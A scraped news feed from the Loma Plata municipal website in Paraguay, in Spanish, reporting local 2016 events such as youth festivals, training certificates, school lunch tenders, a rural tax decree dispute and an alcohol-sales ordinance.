[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/1-Ordenanza-Nº-14.2016.pdf»]

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/2.Odenanza-Nº-14.2016.pdf»]

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/3.-Ordenanza-Nº-14.2016.pdf»]

Publicado: 24.09.16

Danzas, músicas y mucha alegría se vivió anoche en Loma Plata.
dsc00046La Municipalidad de Loma Plata realizó anoche el Festival por el día de la juventud y primavera con una gran cantidad de público que disfrutaron de danzas, músicas y por sobre todo mucha alegría.
El evento arrancó con la bienvenida del intendente de Loma Plata, Don Walter Stockl, quien manifestó: «Jóvenes ustedes tienen la llave en sus manos, ustedes son los que en el día de mañana van a asumir las responsabilidades que hoy estamos asumiendo nosotros como autoridad, para eso deben estar preparados.» Remarcó que el distrito cuenta con una riqueza cultural y que esa diversidad cultural sea respetada para una convivencia fraterna entre Lomaplatenses.
5 fueron las instituciones educativas que participaron del festival Colegio Nacional Héroes del Chaco, Colegio Secundario Loma Plata, Colegio Indígena Yalve Sanga, Colegio Nacional San Miguel y Colegio Nacional Los Primeros Colonos del Chaco, además de los artista locales Grupo de Arpas Ensamble de Loma Plata, el niño Arpista Josué Benítez y en esta ocasión su hermana Jazmín Benítez con el acordeón. Cada institución recibió un trofeo y los artistas obsequios y medallas de agradecimiento por su participación.
El cierre del evento estuvo a cargo del Grupo Juvenil Somai con Male González Y David Troche ofreciendo una cantidad de música moderna para los jóvenes, quienes disfrutaron de la actuación con baile.
Desde la administración municipal agradecemos a todos por el esfuerzo que realizaron todas las personas para que este evento sea posible!!!
MUCHAS GRACIAS!!!

Publicado: 22.09.16

Intendente participó del lanzamiento de la Película Sobrevolando en las lagunas saladas.
dsc04029Anoche el intendente de Loma Plata, Don Walter Stockl participó del lanzamiento de la Película Sobrevolando en las Lagunas Saladas del Chaco. La producción estuvo a cargo Paraguay Salvaje. El estreno se llevo a cabo en el Centro Cultural de España Juan de Salazar con auditorio repleto de públicos seguidores del programa que se emite por Red Guaraní. Actualmente el chaco cuenta con las siguientes lagunas saladas: Chaco Lodge, Campo María, Laguna Capitán, Laguna Ganso y otros.

Además se lanzó la tercera edición de la revista Lagunas Saladas para ambos proyectos la Asociación de Municipios del Chaco Central realizó aporte económico para la realización de dicho documental en película e imágenes fotográficas.
El intendente de Filadelfia, Abogado Holger Bergen en representación de la Asociación manifestó que los intendentes de las municipalidades asociadas están muy comprometidos con este proyecto que busca “Concienciación y sensibilización sobre la fauna y flora de las lagunas saladas chaqueñas”

Publicado: 20.09.16

46 personas de la comunidad de Yalve Sanga recibieron sus certificados de SINAFOCAL.
1Un total de 46 personas (44 mujeres y 2 varones) de la Comunidad indígena de Yalve Sanga recibieron sus certificados y un completo kit para insertarse laboralmente en el rubro de Corte y Confección, gracias a la capacitación gratuita brindada por Sistema Nacional de Formación y Capacitación Laboral

– SINAFOCAL, dependiente del Ministerio de Trabajo, Empleo y Seguridad Social con el acompañamiento de la Municipalidad de Loma Plata. El curso se llevo a cabo en el mes junio con una carga horaria de 100 horas.
El intendente de Loma Plata, Don Walter Stockl participó del acto y en su alocución manifestó que es muy importante la capacitación en mandos medios para la inserción en mundo laboral.

Publicado: 20.09.16

SINAFOCAL entregó certificados.
6Anoche la SINAFOCAL entregó certificado a 26 beneficiarios del curso Teórico Práctico de Cajero/a Comercial que fuera realizado en el Colegio Nacional Héroes del Chaco de Loma Plata en el mes de junio.
En el acto de entrega participó el intendente Don Walter Stockl, que primeramente felicitó a los nuevos egresados por el esfuerzo realizado durante el curso, y, así también agradeció a los organizadores del curso por pensar en Loma Plata para la capacitación en el ámbito laboral y subrayó la importancia de la capacitación de mandos medios.
El ejecutivo municipal remato diciendo que seguirá apoyando cursos de mandos medios para la formación de la ciudadanía del distrito.

 Publicado:19.09.16

INVITACIÓN:

3

Publicado:19.06.16

Comunicado:

2

Publicado:16.09.16

Miembros del Consejo Municipal de la Niñez y Adolescencia se reunieron.

1Sesión Ordinaria del Consejo Municipal de la Niñez y Adolescencia realizada en la fecha de hoy, con la presencia de la mayoria de los miembros para tratar temas referente a:
Charlas en instituciones educativas de Villa Boquerón.
Rally transchaco y su implicancia para el distrito; control y resguardo a menores de edad por parte de CODENI.
Revisión de reglamento interno y pautas de trabajo para lo que resta el año.

Publicado:16.09.16

Villa Boquerón festejó 28 aniversarios.
1En la fecha Villa Boquerón festejó 28 años de vida comunitarios con desfile estudiantil de instituciones educativas del Barrio. En dicha comunidad habitan casi 200 familias totalizando mas de 950 personas. Villa Boquerón tuvo un crecimiento y avance en todo los aspectos; cuenta con 3 instituciones educativas, puesto de salud, hogar de anciano y un internado.
El intendente de Loma Plata, Don Walter Stockl alentó a los pobladores a seguir trabajando juntos Ciudadanía y Autoridades para la realizando de proyectos

comunitarios.
Igualmente participó del desfile el concejal municipal, Prof. Marcial Ramirez.
Al termino del acto se compartió un almuerzo con todos los presentes.

Publicado: 14.09.16

Lanzan campaña de desparasitación en el municipio de Loma Plata.
dsc03801Esta mañana se realizó el lanzamiento de la Campaña Nacional de Desparasitación Masiva a Escolares encabezada por la Región Sanitaria de Boquerón, en la ocasión en el Distrito de Loma Plata, bajo el lema “Jaitýke Sevo’i” año 2016, así mismo, la Municipalidad de Loma Plata ha Declarado de Interés Educativo Distrital dicha campaña mediante Resolución Nº 882/2016 con el objetivo de prevenir y controlar la parasitosis intestinal, contribuir a mejorar la calidad de vida y de salud de los niños/as y favorecer el desempeño escolar. El lanzamiento se realizó en la Escuela Básica Nº 5885 Prof. Cornelius Sawatzky.
En su alocución el Intendente de Loma Plata Don Walter Stockl, agradeció a las instituciones involucradas en esta campaña, además dejo un mensaje a los niños explicando que el cuidado del agua está muy relacionado con la prevención de dichas enfermedades. En ese sentido alegó que en esta época del año escasea el vital líquido y para ello es necesario tratar el agua antes de consumir, si es posible hervir antes de beberla.
Además participaron la secretaria de Salud de la Gobernación de Boquerón Lic. Maura Recalde, el concejal Municipal Prof. Marcial Ramírez y profesionales del Ministerio de Salud.

Publicado: 14.09.16

Consorcio presentó trazado de diseño de la aductora a autoridades de Boquerón.

Los representantes del Consorcio Codisa presentaron a autoridades del Departamento de Boquerón el trazado de los aductores secundarios de la segunda fase del acueducto. Este trazado afectaría las ciudades de Loma Plata, Filadelfia, Neuland y comunidades indígena como Pesempo y otras.

1

El objetivo del encuentro es discutir y analizar con las autoridades locales intendentes y gobernador, el trazado que se usaría para la colocación de los caños.
Participaron de la reunión los intendentes de Loma Plata Don Walter Stockl, Filadelfia Abog. Holger Bergen, Mariscal Estigarribia Elmer Vogt y el gobernador Don Edwin Pauls. Así también representantes de las cooperativas La reunión se realizó ayer en el salón de la Gobernación de Boquerón.

Publicado: 14.09.16

MUNICIPALIDAD DE LOMA PLATA IMPLEMENTARÁ POR PRIMERA VEZ ENTREGA DE ALMUERZO ESCOLAR A INSTITUCIONES EDUCATIVAS DEL DISTRITO CON FONDOS PROVENIENTES DE FONACIDE.
1En fecha 13 de setiembre se llevó a cabo la apertura de sobres de la Licitación por Concurso de Ofertas N° 01/2016 para proveer de los insumos para preparación de almuerzo escolar a tres instituciones educativas del Distrito de Loma Plata, beneficiando a una población de 680 alumnos/as, con fondos provenientes de FONACIDE.
La Municipalidad por su parte mantuvo reuniones con los directivos, miembros de ACES, equipo de gestión comunitaria para explicar el proceso de implementación del Almuerzo Escolar, ya que el proyecto es aprobado en base a directrices del Ministerio de Educación y Cultura según la Ley 5210, incluido un menú básico y forma de implementación pudiendo adecuarse a la cultura y realidad de cada pueblo.
En esta primera etapa las escuelas beneficiadas son Cornelius Sawatzky de Villa Boquerón, Escuela Básica Jacobo Vidal de Yalve Sanga, en ambos lugares la Municipalidad realizó la construcción de un espacio para Comedor Escolar y la Escuela Básica de Pesempo´o que cuenta con espacio destinado para la implementación efectiva del programa.
Una vez adjudicada la empresa local que se presentó a la licitación la entrega se realizará en forma semanal verduras, frutas, productos lácteos y cárnicos y en forma quincenal las demás provisiones.
Con este programa se busca evitar la deserción escolar, brindar una alimentación saludable y balanceada a los niños en edad escolar y utilizar correctamente los recursos destinados a tal fin.

Publicado: 13.09.16

Autoridades de Boquerón se reunieron con la ministra de la SENAC.
1El intendente de Loma plata Don Walter Stockl participó esta mañana de la reunión de autoridades de Boquerón con la Ministra-Secretaria Ejecutiva de la SENAC, Abog. María Soledad Quiñonez Astigarraga. La reunión está enmarcada dentro del marco de las políticas públicas de transparencia, integridad y lucha contra corrupción emprendida por el Gobierno Nacional a través de la Secretaría Nacional Anticorrupción SENAC.
De la reunión participaron el gobernador Edwin Pauls, Intendente de Filadelfia Abog. Holger Bergen, el Presidente de la Junta Departamental, Prof. Oscar Rodas y el Presidente de Junta Municipal de Loma Plata, Don Alex Thiessen.

Publicado: 13.09.16

Autoridades y ciudadanías preocupadas por los cortes de servicios de IPS.
dsc03742A raíz de los cortes de servicios a asegurados del Instituto de Previsión Social autoridades de Boquerón y ciudadanía se reunieron para debatir qué medidas tomar ante esta situación que sufren los aportantes en dicha institución. Dicha iniciativa nació de un grupo de personas aportantes.
El objetivo de dicha reunión es ver el mecanismo de solución que salga desde los afectados, en este caso los asegurados y que las autoridades departamentales y distritales actúen de nexo. Según datos proporcionados el IPS anualmente recibe un aporte tanto del patronal y obrero la suma de 60 mil millones de la zona de Chaco Central.
Don Walter Stockl, Intendente de Loma Plata pidió a los asegurados acompañar a las autoridades ante el IPS para presentar el reclamo y encontrar una pronta solución al problema existente.
La reunión se realizó en la sede de la Municipalidad de Filadelfia, estuvieron presentes los intendentes de Filadlefia, Abogado Holger Bergen, Mariscal Estigarribia Elmer Vogt y el Gobernador Don Edwin Pauls; así como los administradores de los hospitales de Loma Plata y Filadelfia.

Publicado: 10.09.16

Largada simbólica de Super Prime Chaqueño.
dsc03719Esta noche en la ciudad de Loma Plata se realizó el lanzamiento simbólico de la tercera edición del Super Prime Chaqueño. La avenida principal de la ciudad se lleno de seguidores del ruido motor, cuya competencia se realizara en el día de mañana.
Don Walter Stockl, intendente de Loma Plata participo de la largada.

Publicado: 10.09.16

Culminó JUDEDES Boquerón.
1Esta mañana finalizo los Juegos Deportivos Departamentales Estudiantiles (JUDEDES) que se realizó en la ciudad de Filadelfia con la participación de 26 colegios del Departamento de Boquerón con mas de 1.200 alumnos.
El Colegio Secundario de Loma Plata se consagró campeón general al ser la institución con mas títulos obtenidos tanto en lo juegos individuales y colectivos, en segundo lugar el Colegio Secundario de Filadelfia y tercero Colegio Secundario Neuland. Igualmente

fueron premiados los mejores atletas; en femenino Xenia Hiebert del Colegio Secundario de Loma Plata y en masculino Danilo Klassen del Colegio Secundario de Neuland.
El intendente de Loma Plata, Don Walter Stockl participó de la entrega de premios que tuvo lugar en el polideportivo del Colegio Filadelfia.
A continuación las instituciones ganadores en juegos colectivos:
Voleibol
Femenino:
Campeón: Colegio Secundario Loma Plata.
Vice Campeón: Colegio Secundario Filadelfia
Masculino:
Campeón: Colegio Secundario Neuland.
Vice Campeón: Colegio Secundario Loma Plata
Handbol
Femenino:
Campeón: Colegio Secundario de Neuland
Vice Campeón: Colegio Secundario de Loma Plata
Masculino:
Campeón: Colegio Secundario Loma Plata
Vice Campeón: Colegio Secundario Neuland
Fútbol 5
Femenino:
Campeón: Colegio Departamental Boquerón Filadelfia
Vice Campeón: Colegio Nuestra Señora de la Paz
Masculino:
Campeón: Colegio Nacional Mcal. Estigarribia
Vice Campeón: Colegio Secundario Loma Plata
Fútbol de Campo
Femenino:
Campeón: Colegio Nuestra Señora de La Paz
Vice Campeón: Colegio Nac. Héroes del Chaco
Masculino:
Campeón: Colegio Nuestra Señora de la Paz
Vice Campeón: Colegio Santa Teresita.

Publicado: 09.09.16

Perfiladas de caminos y otras informaciones.

1La Municipalidad de Loma plata está realizando esta semana perfilada de los caminos vecinales, iniciándose en el Barrio Residencial Sur de Loma Plata continuando en la zona de Cruce Boquerón, Villa San Miguel, Villa Boquerón, Ex Algodonera y Primer Intendente.

La Municipalidad se encarga de mantener los caminos vecinales en buen estado después de las últimas precipitaciones en la zona.

Aporte
La Municipalidad de Loma Plata desembolsa la suma de Gs. 25 millones mensual a la Asociación Civil Chortitzer para el manteniendo de las calles urbanas de la ciudad. El desembolso se realiza desde el mes de junio del año en curso.

Municipalidad de Loma Plata ya distribuyó más de un millón de litros de agua.
Durante los meses de junio, julio y agosto hasta la fecha la Municipalidad de Loma Plata ya distribuyo 1.050.000 litros de aguas en comunidades indígenas e instituciones educativas oficiales y de salud pública.

En junio se repartió 160.000 litros del vital líquido, en el mes de julio 240.000 litros, mientras que en Agosto y parte de este mes ya se totalizo 650.000.

Es importante mencionar que la cisterna provee agua solamente para aljibes y reservorios comunitarios.

Actualmente la municipalidad cuenta con dos cisternas, una se encarga de proveer agua a los aljibes para consumo humano (Convenio con la Gobernación de Boquerón), y otra realiza continuamente trabajo de regadío de las calles de la ciudad de Loma Plata.

Juntos vamos creciendo…Juntos podemos más!!

Publicado: 09.09.16

Aviso:
La Municipalidad de Loma plata comunica a los estudiantes beneficiados por el apoyo económico otorgado por dicha institución Municipal que pueden pasar a cobrar desde la fecha en los siguientes horarios de oficina de 07:00 a 11:30 y de 13:30 a 17:30 horas en la Dirección Administrativa de la Municipalidad.
Se solicita a los beneficiados traer una copia de cedula y copia de factura del mes de agosto. En caso de presentarse un tercero para el cobro deberá tener la autorización correspondiente por escrito.
Lista de beneficiados/as.
1 Osvaldo Enrique Ibarra Rodríguez
2 Sirley Elizabeth Leguizamón de Martínez
3 Rebeca Sanabria Castaño
4 Leidy Gissel Arrúa Acosta
5 Harol Aristides Calonga Echague
6 Oliver Ortiz Dos Santos
7 Anica Yudit Reimer Aldama
8 Gabriela Sofía Webers Lottermann
9 Máximo Fabián Martínez Mendoza
10 Luis Enrique Moreno Sosa
11 Higinia Rebeca Britos Gómez
12 Lorena Esther Ayala Godoy
13 Aurora Elizabeth Cabrera
14 Regina Pérez Cardizo
15 Analia Natalia Isasi
16 Ada Jorgelina Coronel
17 Celina Martínez Cristaldo
18 Yesica Noemi Corbalan
19 Camelia Alvarez Caballero
20 Maria Noelia Rolon
21 Guiselly Vicenta Verena Ferreira
22 Victor Nicolas Estigarribia Guillen

Publicado: 08.09.16

Intendente participó de la inauguración del JUDEDES.

dsc03554Don Walter Stockl Intendente de Loma Plata participó anoche de la inauguración de la Décima Edición de los Juegos Deportivos Departamentales Estudiantiles (JUDEDES) Boquerón, que se realizó en el Polideportivo del Colegio Secundario Filadelfia. Los juegos arrancaron ayer y su culminación está previsto el día sábado. La administración municipal apoya este evento deportivo estudiantil, con un aporte de 12 millones de guaraníes para cubrir parte importante de los gastos.

Durante la inauguración ya fueron premiados a los mejores atletas en la disciplina de atletismo que se disputo ayer. Participan del evento deportivo estudiantil 26 colegios del Departamento de Boquerón de los tres municipios Loma Plata, Filadelfia y Mariscal Estigarribia, aproximadamente 1.300 alumnos. La Escuela Agrícola Jesús Obrero (BTA) es la única institución que no es del departamento.

En el palco además estuvieron presentes el intendente local Abogado Holger Bergen, el Gobernador Don Edwin Pauls, Pdte. de la Junta Departamental. Prof. Oscar Rodas, y Concejales Municipales de Loma Plata Don Erico Dacosta y Prof. Ricardo Alegre. Además de dirigentes deportivos de la Federación Deportiva Boquerón.

Publicado:07.09.16

dsc03533Don Walter Stockl intendente de Loma Plata participa en la fecha del seminario internacional DESCENTRALIZACIÓN EN Paraguay DESAFIOS Y OPORTUNIDADES. El evento se realiza en el salon bicameral del Congreso Nacional. Ademas participa el intendente d Filadelfia Abog Holger Bergen y de Irala Fernandez lic. Cecilio lopez de la Asociación de Municipios del Chaco Central

Publicado: 06.09.16

Intendente de Loma Plata recibió a alumnos del CFP.

dsc03517Don Walter Stockl Intendente de Loma Plata recibió esta tarde a alumnos del Centro de Formación Profesional. El objetivo de la visita es interiorizar de los trabajos y actividades de la administración municipal. Los jóvenes aprovecharon el horario de Educación Cívica y Ética para la visita donde realizaron varias consultas al ejecutivo municipal.
Don Walter Stockl ejerció la docencia durante 28 años en dicha casa de estudio.

Publicado: 02.09.16

Programa de capacitación y asistencia técnica para Departamentos y Municipios.

img-20160902-wa0001Unidad de Departamentos y Municipios organiza este evento a pedido del Gobernador de Presidente Hayes, Don Antonio Saldivar.
Están presentes varios intendentes de Presidente Hayes y por Boquerón de la Asociación de Municipios del Chaco Central, Don Walter Stockl de Loma Plata, Abogado Holger Bergen de Filadelfia y Lic. Cecilio López de Irala Fernandez.

Publicado: 29.08.16 

Intendente participó de la habilitación de las mejoras en Fortín Toledo.
dsc03408El sábado último el intendente de Loma Plata, Don Walter Stockl participó de la habilitación de las mejoras en el Fortín Toledo. El lugar histórico se encuentra en el Distrito de Mariscal Estigarribia. El propulsor es el Senador Arnoldo Wiens quien es también Presidente de la Comisión de Puesta en Valor y Fomento de los Sitios Históricos de la Guerra del Chaco 1932-1935.
Igualmente estuvieron presente el Presidente del Congreso Nacional Robert Acevedo, senador Pedro

Arthuro Santa Cruz, Ministro de la Corte Suprema de Justicia Dr. Cesar Garay Zuccolillo, intendente de Filadelfia Abogado Holger Bergen. Además de familiares de excombatiente.

Publicado: 27.08.16

Comunicado:

El Intendente Municipal de Loma Plata Don Walter Stockl se une al dolor de las familias de los militares que cayeron en cumplimiento del deber y manifiesta:
Repudiamos totalmente la actuación del grupo criminal. El derecho a la vida, a la seguridad es inherente a toda persona y NADIE tiene el poder de arrebatarlo.
Los hechos de terrorismo atentan contra la soberanía nacional, instamos al Gobierno Central a asumir responsabilidades y salvaguardar los intereses del pueblo, sobre todo proteger la vida y brindar seguridad a todos los ciudadanos.
Mis más sinceras condolencias a los familiares de los caídos. Paraguay esta de luto!!! Loma Plata se une al dolor Nacional.

Publicado: 26.08.16

Aspirantes a Policía de Transito Municipal recibieron certificados.

dsc03353

Ayer recibieron sus certificados un total de 18 aspirante para Policía Municipal de Transito que ejercerán su labor en las diferentes municipalidades de la Asociación de Municipios del Chaco central. El curso tuvo una duración de 120 horas incluyendo la parte teórica y práctica.
Los números de aspirantes por distrito son como sigue, Loma Plata 2, Tte. Primero Manuel Irala Fernández 4, Mariscal Estigarribia 5 y Filadelfia 7. Igualmente formaron Don Walter Stockl, intendente

de Loma Plata participo del acto de entrega de los certificados.

Publicado: 24.08.16

Intendentes del Chaco Central realizan Conferencia de Prensa.

DSC03313

La Asociación de Municipios del Chaco Central (Filadelfia, Loma Plata, Mariscal Estigarribia y Tte. Primero Manuel Irala Fernández) a través de sus respectivos intendentes realizaron una conferencia de prensa a fin de explicar a la ciudadanía las consecuencias negativas que traerá el nuevo Decreto 5775 que afectará directamente a los servicios que realizan los municipios a favor de la ciudadanía.

Todos los municipios de la Asociación coincidieron que están cubriendo necesidades básicas de otras instituciones públicas del nivel central como el pago de salarios a docentes y profesionales del área de salud, INDI, Registro Civil, identificaciones entre otros, que lastimosamente será afectada directamente con el rebaje del impuesto inmobiliario rural.

Según los intendentes nunca fueron consultados sobre este nuevo Decreto presidencial, se promulgó para favorecer a sectores latifundistas que son los beneficiarios directo de esta nueva ley, y que nunca hubo un criterio técnico para su estudio.

Los porcentajes de los recortes en los distritos mencionados son: Filadelfia 48%, Mariscal Estigarribia 42%, Loma Plata 42%, Irala Fernández 49%.

La conferencia se realizo ayer en la sede de la Municipalidad de Filadelfia con la presencia de los intendentes Abogado Holger Bergen de Filadlefia, Don Walter Stockl de Loma Plata, Don Elmer Vogt de Mariscal Estigarribia y Lic. Cecilio López de Tte. Primero Manuel Irala Fernández.

Publicado: 23.08.16

Intendentes del chaco preocupados por Decreto Nº 5775.

IMG-20160823-WA0004

Los intendentes del chaco están preocupados por el nuevo decreto Nº 5775 que reduce el pago de impuesto inmobiliario rural. En ese sentido los intendentes tanto de la Asociación de Municipios de Chaco Central (Filadelfia, Loma Plata, Mariscal Estigarribia y Tte. Primero Manuel Irala Fernández) y la Asociación de Municipios de Presidentes Hayes mantuvieron varias reuniones con diferentes autoridades nacionales en busca de una solución.

Los municipios dependen exclusivamente del ingreso genuino es decir del pago del impuesto de los contribuyentes para la realización de obras e inversiones.

Además sufrirán recortes de los servicios que realizan las municipalidades como el pago de salarios a docentes, profesionales de la salud, mantenimiento de internados, hogares de ancianos, transferencias a instituciones sin fines de lucros entre otros. Muchos de estos servicios necesarios principalmente para las personas más carenciadas de la zona rural son pagadas por las municipalidades gracias a los contribuyentes con el pago de su impuesto.

En ese sentido el Presidente de la Asociación de Municipios del Chaco Central e intendente de Filadelfia, Abogado Holger Bergen, fue tajante y dijo “Con este Decreto, que genera un desfasaje ahora en el presupuesto, lastimosamente, los que pierden al final son los pobladores de escasos recursos y beneficiando a los intereses de las grandes propiedades”.

Publicado: 20.08.16

Autoridades visitan stand de la Asociación de Municipios.

expo3

Autoridades nacionales visitaron el stand de la Asociación de Municipios del Chaco Central (Filadlefia, Loma Plata, Mariscal Estigarribia y Tte. Primero Manuel Irala Fernandez), los cuatros intendentes recibieron a los visitantes y le explicaron el objetivo y los trabajos encarados como asociación.

Publicado: 20.08.16

Rodeo Trébol crece cada año, según organizadores.

expo2

Esta mañana se inauguró la 42ª edición de la Expo Rodeo Trébol con presencia de autoridades nacionales, departamentales, municipales. El presidente de la Asociación Rodeo Trébol, Dr. Egon Neufeld manifestó que este año se registro un récord con mas de 800 animales inscriptos, de los cuales 154 son ovinos y caprinos. Así también un aumento en el ámbito industrial.
como es costumbre en esta exposición desfilaron los mejores animales en el rodeo central.
Don Walter Stockl intendente de Loma Plata Participó del acto inaugural.
Igualmente estuvo presente autoridades de Yacuiba (Bolivia) acompañado por artistas del vecino país.

Publicado:15.08.16

Asociación de Municipios presente en la Expo Trébol.

expo1

Los municipios asociados del Chaco Central, Filadelfia, Loma Plata, Mariscal Estigarribia y de Tte. Primero Manuel Irala Fernandez cuenta con un stand en la Expo Rodeo Trébol donde se expone imágenes de los trabajos o proyectos ejecutados por los diferentes municipios.

Publicado: 15.08.16

Arrancó Expo Rodeo Trébol con gran afluencia de gente.

Expo

Ayer se realizó la apertura oficial de la edición N° 42 de la Expo Rodeo Trébol con presencia de autoridades departamental y muninicipal. El concierto inaugurasl estuvo a cargo del grupo Boys de Texas Estados Unidos con una multitudinarias presencia de público.
Segun el Dr. Egon Neufeld Presidente de la Asociación Rodeo Trébol en esta edición aumento notablemente la cantidad de expositores lo que significa un desafio para los organizadores del evento.
El intendente de Loma Plata participó de las actividades que se realizó en la primera noche del campo ferial.

Publicado:12.08.16

Artistas de Loma Plata lucieron en el Festival Internacional en Yacuiba.

IMG-20160812-WA0004

En la noche internacional de danzas y música en la ciudad de Yacuiba (Bolivia) estuvo presente en dicho evento representantes del Municipio de Loma Plata, la Academia de Danza Giros y Terra Nostra, así también el niño arpista Josué Benítez. El festival se realizó anoche durante la Expo Chaco Sudamérica desarrollada en el país vecino.
Además artistas de los municipios de Filadelfia y Mariscal Estigarribia estuvieron presente en el escenario principal del evento internacional.

Publicado: 09.08.16

Establecen horarios para ventas de bebidas alcohólicas.

Establecen horarios para ventas de bebidas alcohólicas.
La Junta Municipal de Loma Plata sanciona la Ordenanza 10/2016 por la cual se establecen nuevos horarios de apertura de locales que vendan, suministren o comercialicen bebidas alcohólicas y habilita licencia especial para eventos.
Los horarios establecidos para la comercialización son de 06:00 AM a 22:00 PM todos los días para almacenes, despensas, mercados, supermercados, autoservicios y comercios a fines, en donde no se consume la bebida.
En otro de los articulo reza; que los locales en donde se comercialicen, vendan o suministren bebidas alcohólicas para su consumo en el mismo local tales como: comedores, restaurantes, parrilladas y hoteles se establece el horario de 06:00 AM a 23:00 PM de domingo a jueves y de viernes a sábado y víspera de feriado, el horario de 06:00 AM hasta las 00:00 AM.
Otros punto de esta nueva ordenanza es: que la Municipalidad no otorgara licencia para venta de bebidas alcohólicas para estos tipos de negocios (almacenes, despensas, mercados, supermercados, autoservicios y comercios a fines) cuando se encuentran ubicados en frente o a lado de instituciones educativas y de salud sea pública o privada.

Bajo la ordenanza completa para descargar:

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/1-ordenanza1.pdf»]

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/2-ordenanza.pdf»]

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/3-ordenanza.pdf»]

Publicado:09.08.16

Arrancó JEEN en el Distrito de Loma Plata.

DSC02991

Esta mañana arrancó los Juegos Escolares Estudiantiles Nacionales 2016 sub 14 y 17 en masculino y femenino que se disputa en el Polideportivo de MSV (Menno Sport Verein). En la fecha se disputara futsal fifa en donde participan 3 colegios Héroes del Chaco, Primero Colonos y San Miguel. El ganador representará al distrito en la fase departamental.
En la inauguración participó el intendente Don Walter Stockl

Publicado: 08.08.16

Intendente de Loma Plata participó de reunión de Consejo Departamental de Educación.

1

Don Walter Stockl, intendente de Loma Plata participo el viernes último de la reunión del Consejo Departamental de Educación donde se trató diferentes temas como la presentación de la ASCIM en cuanto a los trabajos que realizan dentro de las comunidades indígenas referente al desarrollo comunitario y educativo.
Además los informes mensuales de las actividades realizadas por la Secretaría de Educación y Cultura de la Gobernación de Boquerón, de la Coordinación Departamental y las distintas Supervisiones de Áreas.
Los municipios involucrados dentro del Consejo Departamental de Educación en forma coordinada con la Gobernación de Boquerón establecen pautas de trabajo en el marco de la correcta utilización de los fondos de FONACIDE para construcción de aulas y adquisición de Almuerzo Escolar que beneficie a todas las instituciones educativas.

Publicado:03.08.16

Aviso importante:

DSC02939

La intendencia Municipal de Loma Plata comunica a: todas las personas que tienen retenido su vehículo ya sea motocicleta, auto, camioneta y otros en el Corralón Municipal que durante los meses de agosto y setiembre del año en curso pueden pasar por la oficina municipal para regularizar su situación administrativa y proceder a retirar su vehículo en horario de oficina de 07:00 a 11:30 y de 13:30 a 17:30 los días martes y jueves exclusivamente.

Es importante recordar que la Municipalidad ofrece esta alternativa de conversar con cada persona en particular, analizar su situación y llegar a un acuerdo para entregarle su vehículo.

Publicado: 01.08.16

Consejo Local de Salud de Loma Plata recibe fondo de equidad.

DSC00922

El Consejo Local de Salud recibió el segundo desembolso del fondo de equidad del Ministerio de Salud Pública y Bienestar Social que corresponde al mes de febrero del año 2016. La transferencia es de Gs. 23.500.000 que ayudará para cubrir los gastos que acarrea los centros asistenciales del Distrito de Loma Plata.

El 50 % de esos recursos recibido serán utilizados para pago de personal de blanco. El otro 50 % para compra de equipos, insumos y otras necesidades básicas de los puestos. El Consejo local de Salud tiene a su cargo el Puesto de Salud de Loma Plata y apoya también a la Unidad de Salud Familiar de Villa Boquerón y Puesto de Salud de San Miguel. Igualmente la Municipalidad de Loma Plata cubre otro porcentaje importante a través de transferencias con el cual se sustenta los gastos de salarios que ronda alrededor de los 25.000.000 mensual para personal médico, de enfermería, área administrativo y de limpieza así como de servicios básicos, mantenimiento y reparaciones pequeñas.

Publicado: 01.08.16

Sigue campaña de capacitación en instituciones educativas.

1

El Consejo Municipal de la Niñez y Adolescencia continua con la serie de capacitaciones en instituciones educativas, el viernes último la charla se llevó a cabo en la escuela de la Comunidad Indígena de Pesempo’o.
El objetivo es dar a conocer a los niños, niñas y adolescentes cuáles son sus derechos y obligaciones, la importancia de la Familia y las funciones tanto del Consejo, la CODENI, Juzgado de Paz, Policía Municipal de Tránsito y Policía Nacional quienes están para velar por el cumplimiento de estos derechos y obligaciones conjuntamente con el apoyo de los padres de familia, docentes y directivos.
La Charla fue desarrollada por cada uno de los miembros del Consejo integrado por representante de los diversos grupos sociales que trabajan en esta área.

Publicado: 28.07.16

Planifican la creación de una Biblioteca Pública Municipal en Loma Plata.

DSC02918

Ayer el intendente de Loma Plata, Don Walter Stockl recibió la visita del Director General de la Biblioteca Nacional, Lic. Rubén Capdevila para planificar la creación de una Biblioteca Pública Municipal en la nueva sede de la comuna, considerando el espacio y los equipamientos con que ya se cuenta.

El intendente local manifestó el interés de contar con una biblioteca que pueda ser de acceso para todos los ciudadanos. Por su parte Capdevila manifestó que la institución a su cargo se encargaría de proveer un lote de libros para iniciar el proyecto de instalación de la biblioteca, así como el asesoramiento técnico y capacitación al personal.

En el nuevo local municipal se cuenta con suficiente espacio físico para la preparación de un lugar para los que gusten de la lectura y la investigación. Esto sería el inicio de varios proyectos que pretende llevar a cabo la comuna local en beneficio de los contribuyentes.

Publicado: 26.07.16

7460203-La-polic-a-de-tr-fico-en-amarillo-chaleco-reflectante-haciendo-el-gesto-de-se-ales-para-controlar-el-Foto-de-archivo

La Municipalidad de Loma Plata convoca a las personas que deseen postularse para Policía de Tránsito que desde la fecha pueden presentar sus carpetas en la Municipalidad de Loma Plata en vista al taller de capacitación para el cual serán sometidos. La carpeta deberá ser presentada en forma personal en horario de oficina de 07:00 a 11:30 y de 13:30 a 17:30 de lunes a viernes en Secretaria General acompañado de los siguientes documentos y requisitos:

  • Curriculum Vitae con fotocopia de cédula, Copia de título de bachiller y certificados obtenidos.
  • Mayor de 20 años
  • Bachiller concluido
  • Residente en Loma Plata
  • Buen carácter, trato amable e interesado en trabajar como Policía de tránsito.

El plazo establecido es hasta el día 29 de julio del año 2016

 

Publicado: 20.07.16

Festival del Pueblo con un éxito rotundo en Loma Plata.

DSC02900

El festival del Pueblo organizado por Sonido de la Tierra conjuntamente con la Municipalidad de Loma Plata fue un éxito rotundo desde donde se lo mire en espectáculo artístico y en concurrencia de más de 450 personas.
La participación de artistitas locales como las escuelas de Danza Giros y Terra Nostra, Grupo de Arpas Ensamble Musical de Loma Plata, Solista Delia Rodríguez, el niño arpista Josué Benítez, Robustiano Alemán y Brigido Loewen estos dos últimos de comunidades indígenas de Yalve Sanga y Pesempo’o respectivamente brillaron en el escenario.
